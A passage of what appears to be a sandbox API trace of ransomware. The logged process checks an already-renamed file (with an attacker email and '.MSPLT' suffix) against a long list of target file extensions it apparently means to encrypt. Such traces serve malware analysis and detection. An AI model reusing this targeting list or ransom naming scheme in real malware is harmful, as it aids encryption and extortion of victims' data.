nFileSizeHigh=0x0, nFileSizeLow=0xde4, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0169.069] lstrlenW (lpString="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 52 [0169.069] lstrlenW (lpString=".1cd") returned 4 [0169.069] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0169.069] lstrlenW (lpString=".3ds") returned 4 [0169.070] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0169.070] lstrlenW (lpString=".3fr") returned 4 [0169.070] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0169.070] lstrlenW (lpString=".3g2") returned 4 [0169.070] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0169.070] lstrlenW (lpString=".3gp") returned 4 [0169.070] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0169.070] lstrlenW (lpString=".7z") returned 3 [0169.070] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0169.070] lstrlenW (lpString=".accda") returned 6 [0169.070] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0169.070] lstrlenW (lpString=".accdb") returned 6 [0169.070] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0169.070] lstrlenW (lpString=".accdc") returned 6 [0169.070] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0169.070] lstrlenW (lpString=".accde") returned 6 [0169.070] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0169.070] lstrlenW (lpString=".accdt") returned 6 [0169.070] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0169.070] lstrlenW (lpString=".accdw") returned 6 [0169.070] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0169.070] lstrlenW (lpString=".adb") returned 4 [0169.070] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0169.070] lstrlenW (lpString=".adp") returned 4 [0169.070] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0169.070] lstrlenW (lpString=".ai") returned 3 [0169.070] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0169.070] lstrlenW (lpString=".ai3") returned 4 [0169.070] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0169.071] lstrlenW (lpString=".ai4") returned 4 [0169.071] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0169.071] lstrlenW (lpString=".ai5") returned 4 [0169.071] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0169.071] lstrlenW (lpString=".ai6") returned 4 [0169.071] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0169.071] lstrlenW (lpString=".ai7") returned 4 [0169.071] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0169.071] lstrlenW (lpString=".ai8") returned 4 [0169.071] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0169.071] lstrlenW (lpString=".anim") returned 5 [0169.071] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0169.071] lstrlenW (lpString=".arw") returned 4 [0169.071] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0169.071] lstrlenW (lpString=".as") returned 3 [0169.071] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0169.071] lstrlenW (lpString=".asa") returned 4 [0169.071] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0169.071] lstrlenW (lpString=".asc") returned 4 [0169.071] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0169.071] lstrlenW (lpString=".ascx") returned 5 [0169.071] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0169.071] lstrlenW (lpString=".asm") returned 4 [0169.071] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0169.071] lstrlenW (lpString=".asmx") returned 5 [0169.071] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0169.071] lstrlenW (lpString=".asp") returned 4 [0169.071] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0169.071] lstrlenW (lpString=".aspx") returned 5 [0169.072] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0169.072] lstrlenW (lpString=".asr") returned 4 [0169.072] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0169.072] lstrlenW (lpString=".asx") returned 4 [0169.072] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0169.072] lstrlenW (lpString=".avi") returned 4 [0169.072] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0169.072] lstrlenW (lpString=".avs") returned 4 [0169.214] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0169.214] lstrlenW (lpString=".backup") returned 7 [0169.214] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0169.214] lstrlenW (lpString=".bak") returned 4 [0169.214] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0169.214] lstrlenW (lpString=".bay") returned 4 [0169.215] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0169.215] lstrlenW (lpString=".bd") returned 3 [0169.215] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0169.215] lstrlenW (lpString=".bin") returned 4 [0169.215] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0169.215] lstrlenW (lpString=".bmp") returned 4 [0169.215] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0169.215] lstrlenW (lpString=".bz2") returned 4 [0169.215] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0169.215] lstrlenW (lpString=".c") returned 2 [0169.215] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0169.215] lstrlenW (lpString=".cdr") returned 4 [0169.215] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0169.215] lstrlenW (lpString=".cer") returned 4 [0169.215] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0169.215] lstrlenW (lpString=".cf") returned 3 [0169.215] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0169.215] lstrlenW (lpString=".cfc") returned 4 [0169.215] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0169.215] lstrlenW (lpString=".cfm") returned 4 [0169.215] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0169.215] lstrlenW (lpString=".cfml") returned 5 [0169.215] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0169.215] lstrlenW (lpString=".cfu") returned 4 [0169.215] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0169.215] lstrlenW (lpString=".chm") returned 4 [0169.215] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0169.215] lstrlenW (lpString=".cin") returned 4 [0169.216] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0169.216] lstrlenW (lpString=".class") returned 6 [0169.216] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0169.216] lstrlenW (lpString=".clx") returned 4 [0169.216] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0169.216] lstrlenW (lpString=".config") returned 7 [0169.216] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0169.216] lstrlenW (lpString=".cpp") returned 4 [0169.216] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0169.216] lstrlenW (lpString=".cr2") returned 4 [0169.216] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0169.216] lstrlenW (lpString=".crt") returned 4 [0169.216] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0169.216] lstrlenW (lpString=".crw") returned 4 [0169.216] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0169.216] lstrlenW (lpString=".cs") returned 3 [0169.216] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0169.216] lstrlenW (lpString=".css") returned 4 [0169.216] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0169.216] lstrlenW (lpString=".csv") returned 4 [0169.216] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0169.216] lstrlenW (lpString=".cub") returned 4 [0169.216] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0169.216] lstrlenW (lpString=".dae") returned 4 [0169.216] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0169.216] lstrlenW (lpString=".dat") returned 4 [0169.216] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0169.217] lstrlenW (lpString=".db") returned 3 [0169.217] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0169.217] lstrlenW (lpString=".dbf") returned 4 [0169.217] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0169.217] lstrlenW (lpString=".dbx") returned 4 [0169.217] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0169.217] lstrlenW (lpString=".dc3") returned 4 [0169.217] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0169.217] lstrlenW (lpString=".dcm") returned 4 [0169.217] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0169.217] lstrlenW (lpString=".dcr") returned 4 [0169.217] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0169.217] lstrlenW (lpString=".der") returned 4 [0169.217] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0169.217] lstrlenW (lpString=".dib") returned 4 [0169.217] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0169.217] lstrlenW (lpString=".dic") returned 4 [0169.217] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0169.217] lstrlenW (lpString=".dif") returned 4 [0169.217] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0169.217] lstrlenW (lpString=".divx") returned 5 [0169.217] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0169.217] lstrlenW (lpString=".djvu") returned 5 [0169.217] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0169.217] lstrlenW (lpString=".dng") returned 4 [0169.217] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0169.217] lstrlenW (lpString=".doc") returned 4 [0169.217] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0169.218] lstrlenW (lpString=".docm") returned 5 [0169.218] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0169.218] lstrlenW (lpString=".docx") returned 5 [0169.218] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0169.218] lstrlenW (lpString=".dot") returned 4 [0169.218] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0169.218] lstrlenW (lpString=".dotm") returned 5 [0169.218] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0169.218] lstrlenW (lpString=".dotx") returned 5 [0169.218] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0169.218] lstrlenW (lpString=".dpx") returned 4 [0169.218] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0169.218] lstrlenW (lpString=".dqy") returned 4 [0169.218] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0169.218] lstrlenW (lpString=".dsn") returned 4 [0169.218] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0169.218] lstrlenW (lpString=".dt") returned 3 [0169.218] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0169.218] lstrlenW (lpString=".dtd") returned 4 [0169.218] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0169.218] lstrlenW (lpString=".dwg") returned 4 [0169.218] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0169.218] lstrlenW (lpString=".dwt") returned 4 [0169.218] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0169.218] lstrlenW (lpString=".dx") returned 3 [0169.218] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0169.218] lstrlenW (lpString=".dxf") returned 4 [0169.218] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0169.219] lstrlenW (lpString=".edml") returned 5 [0169.219] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0169.219] lstrlenW (lpString=".efd") returned 4 [0169.219] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0169.219] lstrlenW (lpString=".elf") returned 4 [0169.219] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0169.219] lstrlenW (lpString=".emf") returned 4 [0169.219] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0169.219] lstrlenW (lpString=".emz") returned 4 [0169.219] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0169.219] lstrlenW (lpString=".epf") returned 4 [0169.219] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0169.219] lstrlenW (lpString=".eps") returned 4 [0169.219] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0169.219] lstrlenW (lpString=".epsf") returned 5 [0169.219] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0169.219] lstrlenW (lpString=".epsp") returned 5 [0169.219] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0169.219] lstrlenW (lpString=".erf") returned 4 [0169.219] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0169.219] lstrlenW (lpString=".exr") returned 4 [0169.219] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0169.219] lstrlenW (lpString=".f4v") returned 4 [0169.219] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0169.219] lstrlenW (lpString=".fido") returned 5 [0169.219] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0169.220] lstrlenW (lpString=".flm") returned 4 [0169.220] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0169.220] lstrlenW (lpString=".flv") returned 4 [0169.220] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0169.220] lstrlenW (lpString=".frm") returned 4 [0169.220] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0169.220] lstrlenW (lpString=".fxg") returned 4 [0169.220] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0169.220] lstrlenW (lpString=".geo") returned 4 [0169.220] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0169.220] lstrlenW (lpString=".gif") returned 4 [0169.220] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0169.220] lstrlenW (lpString=".grs") returned 4 [0169.220] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0169.220] lstrlenW (lpString=".gz") returned 3 [0169.220] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0169.220] lstrlenW (lpString=".h") returned 2 [0169.220] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0169.220] lstrlenW (lpString=".hdr") returned 4 [0169.220] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0169.220] lstrlenW (lpString=".hpp") returned 4 [0169.220] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0169.220] lstrlenW (lpString=".hta") returned 4 [0169.220] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0169.220] lstrlenW (lpString=".htc") returned 4 [0169.220] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0169.220] lstrlenW (lpString=".htm") returned 4 [0169.220] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0169.221] lstrlenW (lpString=".html") returned 5 [0169.221] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0169.221] lstrlenW (lpString=".icb") returned 4 [0169.221] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0169.221] lstrlenW (lpString=".ics") returned 4 [0169.221] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0169.221] lstrlenW (lpString=".iff") returned 4 [0169.221] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0169.221] lstrlenW (lpString=".inc") returned 4 [0169.221] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0169.221] lstrlenW (lpString=".indd") returned 5 [0169.221] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0169.221] lstrlenW (lpString=".ini") returned 4 [0169.221] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0169.221] lstrlenW (lpString=".iqy") returned 4 [0169.221] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0169.221] lstrlenW (lpString=".j2c") returned 4 [0169.221] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0169.221] lstrlenW (lpString=".j2k") returned 4 [0169.221] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0169.221] lstrlenW (lpString=".java") returned 5 [0169.221] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0169.221] lstrlenW (lpString=".jp2") returned 4 [0169.221] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0169.221] lstrlenW (lpString=".jpc") returned 4 [0169.221] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0169.221] lstrlenW (lpString=".jpe") returned 4 [0169.221] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0169.222] lstrlenW (lpString=".jpeg") returned 5 [0169.222] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0169.222] lstrlenW (lpString=".jpf") returned 4 [0169.222] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0169.222] lstrlenW (lpString=".jpg") returned 4 [0169.222] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0169.222] lstrlenW (lpString=".jpx") returned 4 [0169.222] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0169.222] lstrlenW (lpString=".js") returned 3 [0169.222] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0169.222] lstrlenW (lpString=".jsf") returned 4 [0169.222] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0169.222] lstrlenW (lpString=".json") returned 5 [0169.222] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0169.222] lstrlenW (lpString=".jsp") returned 4 [0169.222] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0169.222] lstrlenW (lpString=".kdc") returned 4 [0169.222] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0169.222] lstrlenW (lpString=".kmz") returned 4 [0169.222] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0169.222] lstrlenW (lpString=".kwm") returned 4 [0169.222] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0169.222] lstrlenW (lpString=".lasso") returned 6 [0169.222] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0169.222] lstrlenW (lpString=".lbi") returned 4 [0169.222] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0169.222] lstrlenW (lpString=".lgf") returned 4 [0169.222] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0169.223] lstrlenW (lpString=".lgp") returned 4 [0169.223] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0169.223] lstrlenW (lpString=".log") returned 4 [0169.223] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0169.223] lstrlenW (lpString=".m1v") returned 4 [0169.223] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0169.223] lstrlenW (lpString=".m4a") returned 4 [0169.223] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0169.223] lstrlenW (lpString=".m4v") returned 4 [0169.223] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0169.223] lstrlenW (lpString=".max") returned 4 [0169.223] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0169.223] lstrlenW (lpString=".md") returned 3 [0169.223] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0169.223] lstrlenW (lpString=".mda") returned 4 [0169.223] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0169.223] lstrlenW (lpString=".mdb") returned 4 [0169.223] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0169.223] lstrlenW (lpString=".mde") returned 4 [0169.223] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0169.223] lstrlenW (lpString=".mdf") returned 4 [0169.223] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0169.223] lstrlenW (lpString=".mdw") returned 4 [0169.223] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0169.223] lstrlenW (lpString=".mef") returned 4 [0169.223] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0169.223] lstrlenW (lpString=".mft") returned 4 [0169.224] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0169.224] lstrlenW (lpString=".mfw") returned 4 [0169.224] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0169.224] lstrlenW (lpString=".mht") returned 4 [0169.224] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0169.224] lstrlenW (lpString=".mhtml") returned 6 [0169.224] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0169.224] lstrlenW (lpString=".mka") returned 4 [0169.224] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0169.224] lstrlenW (lpString=".mkidx") returned 6 [0169.224] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0169.224] lstrlenW (lpString=".mkv") returned 4 [0169.224] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0169.224] lstrlenW (lpString=".mos") returned 4 [0169.224] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0169.224] lstrlenW (lpString=".mov") returned 4 [0169.224] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0169.224] lstrlenW (lpString=".mp3") returned 4 [0169.224] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0169.224] lstrlenW (lpString=".mp4") returned 4 [0169.224] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0169.224] lstrlenW (lpString=".mpeg") returned 5 [0169.224] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0169.224] lstrlenW (lpString=".mpg") returned 4 [0169.224] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0169.224] lstrlenW (lpString=".mpv") returned 4 [0169.224] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0169.225] lstrlenW (lpString=".mrw") returned 4 [0169.225] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0169.225] lstrlenW (lpString=".msg") returned 4 [0169.225] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0169.225] lstrlenW (lpString=".mxl") returned 4 [0169.225] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0169.225] lstrlenW (lpString=".myd") returned 4 [0169.225] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0169.225] lstrlenW (lpString=".myi") returned 4 [0169.225] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0169.225] lstrlenW (lpString=".nef") returned 4 [0169.225] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0169.225] lstrlenW (lpString=".nrw") returned 4 [0169.225] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0169.225] lstrlenW (lpString=".obj") returned 4 [0169.225] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0169.225] lstrlenW (lpString=".odb") returned 4 [0169.225] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0169.225] lstrlenW (lpString=".odc") returned 4 [0169.225] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0169.225] lstrlenW (lpString=".odm") returned 4 [0169.225] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0169.225] lstrlenW (lpString=".odp") returned 4 [0169.225] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0169.225] lstrlenW (lpString=".ods") returned 4 [0169.225] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0169.226] lstrlenW (lpString=".oft") returned 4 [0169.226] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0169.226] lstrlenW (lpString=".one") returned 4 [0169.226] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0169.226] lstrlenW (lpString=".onepkg") returned 7 [0169.226] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0169.226] lstrlenW (lpString=".onetoc2") returned 8 [0169.226] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0169.226] lstrlenW (lpString=".opt") returned 4 [0169.226] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0169.226] lstrlenW (lpString=".oqy") returned 4 [0169.226] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0169.226] lstrlenW (lpString=".orf") returned 4 [0169.226] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0169.226] lstrlenW (lpString=".p12") returned 4 [0169.226] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0169.226] lstrlenW (lpString=".p7b") returned 4 [0169.226] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0169.226] lstrlenW (lpString=".p7c") returned 4 [0169.226] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0169.226] lstrlenW (lpString=".pam") returned 4 [0169.226] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0169.226] lstrlenW (lpString=".pbm") returned 4 [0169.226] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0169.226] lstrlenW (lpString=".pct") returned 4 [0169.226] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0169.226] lstrlenW (lpString=".pcx") returned 4 [0169.226] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0169.227] lstrlenW (lpString=".pdd") returned 4 [0169.227] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0169.227] lstrlenW (lpString=".pdf") returned 4 [0169.227] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0169.227] lstrlenW (lpString=".pdp") returned 4 [0169.227] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0169.227] lstrlenW (lpString=".pef") returned 4 [0169.227] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0169.227] lstrlenW (lpString=".pem") returned 4 [0169.227] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0169.227] lstrlenW (lpString=".pff") returned 4 [0169.227] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0169.227] lstrlenW (lpString=".pfm") returned 4 [0169.227] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0169.227] lstrlenW (lpString=".pfx") returned 4 [0169.227] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0169.227] lstrlenW (lpString=".pgm") returned 4 [0169.227] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0169.227] lstrlenW (lpString=".php") returned 4 [0169.227] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0169.227] lstrlenW (lpString=".php3") returned 5 [0169.227] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0169.227] lstrlenW (lpString=".php4") returned 5 [0169.227] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0169.227] lstrlenW (lpString=".php5") returned 5 [0169.227] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0169.227] lstrlenW (lpString=".phtml") returned 6 [0169.227] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0169.228] lstrlenW (lpString=".pict") returned 5 [0169.228] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0169.228] lstrlenW (lpString=".pl") returned 3 [0169.228] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0169.228] lstrlenW (lpString=".pls") returned 4 [0169.228] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0169.228] lstrlenW (lpString=".pm") returned 3 [0169.228] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0169.228] lstrlenW (lpString=".png") returned 4 [0169.228] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0169.228] lstrlenW (lpString=".pnm") returned 4 [0169.228] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0169.228] lstrlenW (lpString=".pot") returned 4 [0169.228] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0169.228] lstrlenW (lpString=".potm") returned 5 [0169.228] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0169.228] lstrlenW (lpString=".potx") returned 5 [0169.228] lstrcmpiW (lpString1=".potx", 